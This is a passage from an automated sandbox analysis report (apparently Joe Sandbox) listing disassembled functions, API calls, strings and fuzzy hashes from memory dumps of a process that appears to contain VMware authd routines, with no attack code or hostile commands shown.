                                                    • Invalid arguments to '%s%s', xrefs: 00ED1120
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$free
                                                    • String ID: Invalid arguments to '%s%s'
                                                    • API String ID: 2642810717-2166776113
                                                    • Opcode ID: e3994e279c6713f3b454c499ace23f79e2448cebde8779ba8af244f6df83a20d
                                                    • Instruction ID: 85a6640f798a3a549a2405ed35168962fb092e28ddb5138fef923702b8c35b28
                                                    • Opcode Fuzzy Hash: e3994e279c6713f3b454c499ace23f79e2448cebde8779ba8af244f6df83a20d
                                                    • Instruction Fuzzy Hash: E5F042763003406BD7106F65FC15FA977A9DB86714F04507FFB096B753C2626B4287A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED1040 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00ED1077
                                                    • Warning.VMWAREBASE(?), ref: 00ED107E
                                                      • Part of subcall function 00ED3B70: Warning.VMWAREBASE(?,00000400,?,?), ref: 00ED3B96
                                                    Strings
                                                    • Invalid arguments to '%s%s', xrefs: 00ED10A0
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$free
                                                    • String ID: Invalid arguments to '%s%s'
                                                    • API String ID: 2642810717-2166776113
                                                    • Opcode ID: 63dd4ec94f5c7d5acca129c158f53a54f721161db1d982f1653621d052e1492e
                                                    • Instruction ID: d98ed6eece2a30c099625b8afdd76fd3c94c17150c2373e17a3cac2c4527bbd9
                                                    • Opcode Fuzzy Hash: 63dd4ec94f5c7d5acca129c158f53a54f721161db1d982f1653621d052e1492e
                                                    • Instruction Fuzzy Hash: 6DF04276700340ABD7106F64FC11FA977A9DB86714F04507FFB056B353C222674287A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED23D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Warning.VMWAREBASE(?,000000C0,?), ref: 00ED23F2
                                                    • Warning.VMWAREBASE(00000000,?,000000C0,?), ref: 00ED23F8
                                                      • Part of subcall function 00ED3B70: Warning.VMWAREBASE(?,00000400,?,?), ref: 00ED3B96
                                                    Strings
                                                    • Error retrieving thumbprint, xrefs: 00ED242D
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning
                                                    • String ID: Error retrieving thumbprint
                                                    • API String ID: 2415109466-3028483890
                                                    • Opcode ID: 3f6899b2e74b9339cdbf0c8ae9667a60fefc779a9473070f0c1a20be876f2c7b
                                                    • Instruction ID: 784065a58f63de8e11328f242bd2f918e785394a14cb809693e3a1a527c8d4f1
                                                    • Opcode Fuzzy Hash: 3f6899b2e74b9339cdbf0c8ae9667a60fefc779a9473070f0c1a20be876f2c7b
                                                    • Instruction Fuzzy Hash: 21F06870A4130CA6EF20FB649D17F6973A8DB00704F4015EBBE097B3C2E9756A1A9686
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED13D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Warning.VMWAREBASE(?,00000100,00EDA850,?), ref: 00ED13E9
                                                      • Part of subcall function 00ED3B70: Warning.VMWAREBASE(?,00000400,?,?), ref: 00ED3B96
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning
                                                    • String ID: Password required for %s.$USER too long.
                                                    • API String ID: 2415109466-1624167280
                                                    • Opcode ID: 6c7ad5b0f1a0ed45e6591a1bb9cf87a953f30fbfad15d0f475c794d93e4b6d25
                                                    • Instruction ID: 6d79aa112e50fd2d4fbfbb57bad3bd85ff4dba87920a3b026ee6d9941aaf75f9
                                                    • Opcode Fuzzy Hash: 6c7ad5b0f1a0ed45e6591a1bb9cf87a953f30fbfad15d0f475c794d93e4b6d25
                                                    • Instruction Fuzzy Hash: C7F0A73378030432E7206969AC03FD63358D781B25F04153BF7287A3C2D2D1765242A7
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED2700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Warning.VMWAREBASE(?,00001000,?,00ED6E9C,?,00ED6E9C,RevertToSelf failed: %d,00000000), ref: 00ED273F
                                                      • Part of subcall function 00ED27C0: GetLastError.KERNEL32(?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27D8
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27F3
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00EDA850,?,?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED2807
                                                      • Part of subcall function 00ED27C0: _printf.MSPDB140-MSVCRT ref: 00ED2824
                                                      • Part of subcall function 00ED27C0: SetLastError.KERNEL32(00000000,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED282D
                                                      • Part of subcall function 00ED39A0: Warning.VMWAREBASE(?,00000406,?,?,?), ref: 00ED39D9
                                                      • Part of subcall function 00ED39A0: Warning.VMWAREBASE(00000000,?,?,?,?,?,?), ref: 00ED3A21
                                                      • Part of subcall function 00ED39A0: WSAGetLastError.WS2_32(?,?,?,?,?,?), ref: 00ED3A2B
                                                      • Part of subcall function 00ED39A0: WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?), ref: 00ED3A49
                                                      • Part of subcall function 00ED39A0: Warning.VMWAREBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00ED3AD1
                                                      • Part of subcall function 00ED39A0: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00ED3AEE
                                                      • Part of subcall function 00ED3DD0: ExitThread.KERNEL32 ref: 00ED3DF3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$ErrorLast$CloseExitHandleObjectSingleThreadWait_printf
                                                    • String ID: 599 vmware-authd PANIC: %s$PANIC: %s
                                                    • API String ID: 333243209-1572072357
                                                    • Opcode ID: f416d13f9520b6f89e86e4bb48deceef7ec48edc5ee071afadaea82ef59354ba
                                                    • Instruction ID: 6040b2efb1c74c55a95507c29761dc74080cb634497623de2386aafdbf6ca2ea
                                                    • Opcode Fuzzy Hash: f416d13f9520b6f89e86e4bb48deceef7ec48edc5ee071afadaea82ef59354ba
                                                    • Instruction Fuzzy Hash: F6F09674600248AED711EB90CC46FE873ECEB08795F44109ABA48AB346DAB16AC58B65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF514F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 6CF514F5
                                                      • Part of subcall function 6CF766AC: std::invalid_argument::invalid_argument.LIBCONCRT ref: 6CF766B8
                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 6CF5151E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Xinvalid_argument___std_exception_copystd::_std::invalid_argument::invalid_argument
                                                    • String ID: string too long
                                                    • API String ID: 1846318660-2556327735
                                                    • Opcode ID: 7aac222ac65d09daf5e4b5027e8375a6749e7d86315ab4771ab691042467fbfa
                                                    • Instruction ID: ebb62d91c2cc3168c6e93c67c8cfd075a532c06f126cef18f55fa0f2b5089274
                                                    • Opcode Fuzzy Hash: 7aac222ac65d09daf5e4b5027e8375a6749e7d86315ab4771ab691042467fbfa
                                                    • Instruction Fuzzy Hash: 74E0C2B3910308A7CA109FA8EC029C6B7ACDF1A6587108527F648EBF00E771A88087B4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED78F0 Relevance: 5.1, APIs: 4, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(?,?,00000000,?), ref: 00ED7910
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00ED7977
                                                    • CloseHandle.KERNEL32(?), ref: 00ED797E
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?), ref: 00ED7990
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$CloseEnterHandleLeavefree
                                                    • String ID:
                                                    • API String ID: 321630039-0
                                                    • Opcode ID: 6e00989e63f7c6ab1ffc76082bfcafab42d2a7da2080464a1b1ccc4691f12f24
                                                    • Instruction ID: 05bbb65ebaf551e4bdcbea15631e0c7c302fd49c05a338a499f5db05f771b296
                                                    • Opcode Fuzzy Hash: 6e00989e63f7c6ab1ffc76082bfcafab42d2a7da2080464a1b1ccc4691f12f24
                                                    • Instruction Fuzzy Hash: 18118135501148DFC700CF59E994AAC77B9EF8E305F5000AAE905EB331D331AB89CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED1F10 Relevance: 5.0, APIs: 4, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00ED3240: Warning.VMWAREBASE(0000002C,?,NOT_IMPLEMENTED %s:%d,bora\apps\vmauthd\authdWin32.c,000001DA,?,00ED15CF), ref: 00ED325D
                                                      • Part of subcall function 00ED3240: CloseHandle.KERNEL32(00000008,?,NOT_IMPLEMENTED %s:%d,bora\apps\vmauthd\authdWin32.c,000001DA,?,00ED15CF), ref: 00ED3273
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00ED1F33
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00ED1F51
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 00ED1F76
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00ED1F7F
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: free$CloseHandleWarning
                                                    • String ID:
                                                    • API String ID: 3628937476-0
                                                    • Opcode ID: 4d5256a9344ab4e957c9dcfe0a749f48ad7c040682dea8478dbd4ad7c1ef05ce
                                                    • Instruction ID: db3687eb212f686f28852465f0c90810431380d71fdb970d745bdc6108e7e12b
                                                    • Opcode Fuzzy Hash: 4d5256a9344ab4e957c9dcfe0a749f48ad7c040682dea8478dbd4ad7c1ef05ce
                                                    • Instruction Fuzzy Hash: 5601A7B0501700DFDB20AF61E804B4AB7E4FF04314F04842AF95A67321CB3AA654CF41
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%